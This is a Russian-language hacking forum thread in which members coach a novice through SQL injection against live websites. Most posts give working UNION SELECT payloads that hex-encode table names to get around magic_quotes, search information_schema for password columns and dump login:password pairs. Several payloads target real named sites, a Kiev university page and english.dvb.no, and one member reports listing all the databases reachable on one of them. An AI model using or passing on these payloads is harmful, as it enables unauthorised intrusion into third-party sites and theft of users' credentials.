Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    magic_quotes режет.

    имя_таблицы в хексе делай.

    типа так: table_name=0x7573657273
    x3k.ru
     
    #6781 ph1l1ster, 28 Apr 2009
    Last edited: 28 Apr 2009
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    www.philology.kiev.ua/php/kafkaf.php?id=7&sid=2
    Инклюд. Уязвим параметр id. Но вот расскрутить не могу. Help me, please!
     
  3. Conroe

    Conroe New Member

    Joined:
    27 Apr 2009
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    news.php?id=-349+union+select+1,column_name,3,4,5,6,7,8,9+from+information_shema.columns+where+table_name='0x434f4c4c4154494f4e53'+limit+1,1--

    table_name=COLLATIONS
    пробовал маленькими буквами т.к. хекс для них разный :(
     
  4. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    кавычки тут не нужны, так как для mysql это уже 16ричное представление строки.
    news.php?id=-349+union+select+1,column_name,3,4,5,6,7,8,9+from+information_shema.columns+where+table_name=0x434f4c4c4154494f4e53+limit+1,1--

    как раз кавычки и обламывают тебе инъекцию, точнее ее обламывает magic_quotes_gpc= ON
    эта опция экранирует спецсимволы такие как кавычка и нуллбайт итд.
    при этом сервер получает запрос вида блаблабла where table_name=\'collations\'
    а такой запрос не является синтакисчески верным.
     
    #6784 geezer.code, 28 Apr 2009
    Last edited: 28 Apr 2009
    1 person likes this.
  5. Conroe

    Conroe New Member

    Joined:
    27 Apr 2009
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    пробовал результат одинаковый
     
  6. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    линк сюда, либо в пм.


    зы +from+ information_schema.columns+
     
  7. Conroe

    Conroe New Member

    Joined:
    27 Apr 2009
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    :mad: :( :confused: :eek: долбанная невнимательность
     
  8. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    Может для начинающего это и лишния информация, но все таки...
    Дабы упростить поск таблиц где есть поля "login"&"password" к (примеру..
    Можно воспользоваться оператором like
    Синтаксис такой:
    news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table_schema),3,4,5,6,7,8,9+from+ information_shema.columns+where+column_name+like+'password'--+
    Данный запрос выведет:
    Имя таблици и названия базы, где есть поля password/* так же при необходимости слово password моно перевести в 16й код..
    Так же моно листать через оператор limit
    news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table_schema),3,4,5,6,7,8,9+from+ information_shema.columns+where+column_name+like+'password'+limit+1,1--+
     
    #6788 farex, 28 Apr 2009
    Last edited: 28 Apr 2009
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    И к чему это? Прочти <title>(.*)</title>
     
  10. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    Ну вообще чел тока начинает крутить скули......
    Это инфа, к общему развитию.....
     
    1 person likes this.
  11. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Чисто password не всегда бывает, тогда уже '%pass%' или в хексе при слешировании кавычек.
     
    1 person likes this.
  12. Conroe

    Conroe New Member

    Joined:
    27 Apr 2009
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    а данный запрос выводит одно название базы где есть поля password/* или все?
    получаем: Subscription:dvb т.е. table_name=Subscription
    db_name=dvb ?
     
    1 person likes this.
  13. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    Выводит названия базы и таблицу(в этой базе), где находятся колонка "password"

    table_name=Subscription: имя таблици где есть колонка "password"
    table_schema: имя бд в которой находится таблица "Subscription"
    с колонкой "password"
     
    #6793 farex, 28 Apr 2009
    Last edited: 28 Apr 2009
  14. Conroe

    Conroe New Member

    Joined:
    27 Apr 2009
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    :D вот с этим не сопоставимо:http://xxx/news.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM Users LIMIT 1,1 -- видимо устаревает информация
    Для вывода логина и пасс делаем:
    -349+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9+from+хекс(Subscription)+limit+1,1
    или же как-то подругому?

    Для вывода логина и пасс имя БД нам необязательно? т.к. запросы все равно идут в пределах базы, к которой обращается скрипт.
     
  15. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    Для вывода логина и паса....(Когда ты уже узнал названия столбцов разумеется.
    Делается так:
    -349+union+select+1,concat_ws(0x3a,login,password), 3,4,5,6,7,8,9+from+table_name
    где, table_name -это названия таблици (от кудого ты вытащил(login&password))
    Обязательно, лишm в том случае если таблица находится в другой базе ...
    Например:
    349+union+select+1,database(), 3,4,5,6,7,8,9
    нам вывело, что названия БД "test"
    а
    349+union+select+1,table_schema, 3,4,5,6,7,8,9+from+information_schema.columns+where+table_name='users'
    нам выдало, что таблица users находится в базе test1
    тогда, для вывода, используем следующий запрос...
    349+union+select+1,concat_ws(0x3a,login,password), 3,4,5,6,7,8,9+from+test1.users
     
    #6795 farex, 28 Apr 2009
    Last edited: 28 Apr 2009
    1 person likes this.
  16. Conroe

    Conroe New Member

    Joined:
    27 Apr 2009
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    совсем запутался...
    имеем: http://english.dvb.no/news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table_schema),3,4,5,6,7,8,9+from+information_schema.columns+where+column_name+like+0x70617373776f7264--

    Subscription:dvb
    соотв в базе dvb есть таблица Subscription в которой есть колонка(столбец) password
    database ()= dvb
    запрос:
    http://english.dvb.no/news.php?id=-349+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9+from+0x537562736372697074696f6e--
    ничего не дает, видимо мы не знаем, а login ли мы ищем? правильно?
    как достать его "login"?
     
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Conroe
    что это?
    from+0x537562736372697074696f6e

    Обязательно посмотри мою подпись (красненьким)
     
    2 people like this.
  18. Conroe

    Conroe New Member

    Joined:
    27 Apr 2009
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    from+0x537562736372697074696f6e ----> хекс Subscription

    p.s. спасибо за подпись, все что читал далеко от сегодняшнего дня
    в основном по SQL-inj читал https://forum.antichat.ru/threadnav43966-1-10.html
     
  19. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Вот собственно все базы и таблички доступные тукушему юзеру(без Information):
    крч ничего инетересного
    З.Ы.Сорри за изврат.
     
    #6799 AkyHa_MaTaTa, 28 Apr 2009
    Last edited: 28 Apr 2009
    2 people like this.
  20. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    Conroe
    RTFM!!! ......читай внимательнее, и все встанет, на свои места...
     
    #6800 farex, 28 Apr 2009
    Last edited: 28 Apr 2009
Thread Status:
Not open for further replies.